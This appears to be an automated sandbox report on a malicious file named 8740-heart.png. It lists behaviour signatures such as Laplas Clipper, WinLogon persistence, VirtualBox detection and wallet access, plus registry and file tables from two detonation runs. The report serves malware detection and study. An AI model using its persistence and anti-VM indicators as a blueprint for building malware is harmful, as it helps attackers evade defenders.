Analysis Overview
SHA256
b4dbc2861c1cb405efae402534731e48814cb75d7b34755e82fad25ae4b572b6
Threat Level: Known bad
The file 8740-heart.png was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Laplas Clipper
Modifies WinLogon for persistence
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Modifies RDP port number used by Windows
Stops running service(s)
Sets service image path in registry
Drops file in Drivers directory
Downloads MZ/PE file
Checks BIOS information in registry
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Registers COM server for autorun
Drops startup file
Checks computer location settings
Adds Run key to start application
Checks installed software on the system
Checks whether UAC is enabled
Accesses cryptocurrency files/wallets, possible credential harvesting
Accesses 2FA software files, possible credential harvesting
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Detected potential entity reuse from brand google.
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
Program crash
Enumerates physical storage devices
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Script User-Agent
Suspicious behavior: AddClipboardFormatListener
Kills process with taskkill
Checks processor information in registry
Modifies Internet Explorer settings
Suspicious behavior: GetForegroundWindowSpam
Uses Volume Shadow Copy service COM API
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Uses Volume Shadow Copy WMI provider
GoLang User-Agent
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Modifies data under HKEY_USERS
Modifies system certificate store
Analysis: static1
Detonation Overview
Reported
2023-07-25 21:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-25 21:01
Reported
2023-07-25 21:31
Platform
win7-20230712-en
Max time kernel
1559s
Max time network
1561s
Signatures
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\rundll32.exe | N/A |
Processes
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\Admin\AppData\Local\Temp\8740-heart.png
Network
Files
memory/2496-53-0x0000000001B40000-0x0000000001B41000-memory.dmp
memory/2496-54-0x0000000001B40000-0x0000000001B41000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-07-25 21:01
Reported
2023-07-25 21:31
Platform
win10v2004-20230703-en
Max time kernel
1635s
Max time network
1800s
Signatures
Laplas Clipper
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\19965126155501944123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\DRIVERS\SET95A1.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET8E0.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET6114.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET64AF.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET7E00.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SETFDE3.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET5B95.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET8302.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETFDE3.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET6ACC.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET682B.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET6ACC.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETAE5D.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\mbamtestfile.dat | C:\Users\Admin\Downloads\MBSetup.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET8302.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET837D.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET89CA.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET89CA.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET8205.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET839E.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET839E.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\drivers\mbae64.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\MbamElam.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\MbamElam.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET83CE.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\ProgramData\86996301282502183715.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\mbam.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET9E9B.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET9E9B.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET8E0.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET64AF.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET8205.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET837D.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\farflt.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET7E00.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET83CE.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET5B95.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET95A1.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SET6114.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SET682B.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SETAE5D.tmp | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Program Files\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\mbamswissarmy.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\MbamChameleon.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\mwac.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Modifies RDP port number used by Windows
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MBAMSwissArmy\ImagePath = "\\SystemRoot\\System32\\Drivers\\mbamswissarmy.sys" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MBAMChameleon\ImagePath = "\\SystemRoot\\System32\\Drivers\\MbamChameleon.sys" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\MBSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\Downloads\MBSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\19965126155501944123.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\19965126155501944123.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS477B1A6F\WebCompanionInstaller.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-16.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-JN5DD.tmp\OneLaunch - Easy PDF_3x8a5.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneLaunchUpdater.lnk | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneLaunch.lnk | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneLaunchChromium.lnk | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneLaunchUpdater.lnk | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneLaunch.lnk | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneLaunchChromium.lnk | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9DAB0CA5-AE19-41AE-955C-41DD44C52697}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\CLSID\{b1cfdc44-dff4-204c-e500-42a98fc246ba}\LocalServer32 | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11D1E5E8-14E1-4B5B-AE1A-2678CB91E8E5}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D5599B6B-FA0C-45B5-8309-853B003EA412}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{b1cfdc44-dff4-204c-e500-42a98fc246ba}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\OneLaunch\\5.17.4\\onelaunch.exe\" -ToastActivated" | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BF474111-9116-45C6-AF53-209E64F1BB53}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{17BE78EE-B40A-4B9E-835F-38EC62F9D479}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{17BE78EE-B40A-4B9E-835F-38EC62F9D479}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9DAB0CA5-AE19-41AE-955C-41DD44C52697}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{580243BF-3CEE-4131-A599-C6FED66BEB1B}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11D1E5E8-14E1-4B5B-AE1A-2678CB91E8E5}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LOCALSERVER32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BF474111-9116-45C6-AF53-209E64F1BB53}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
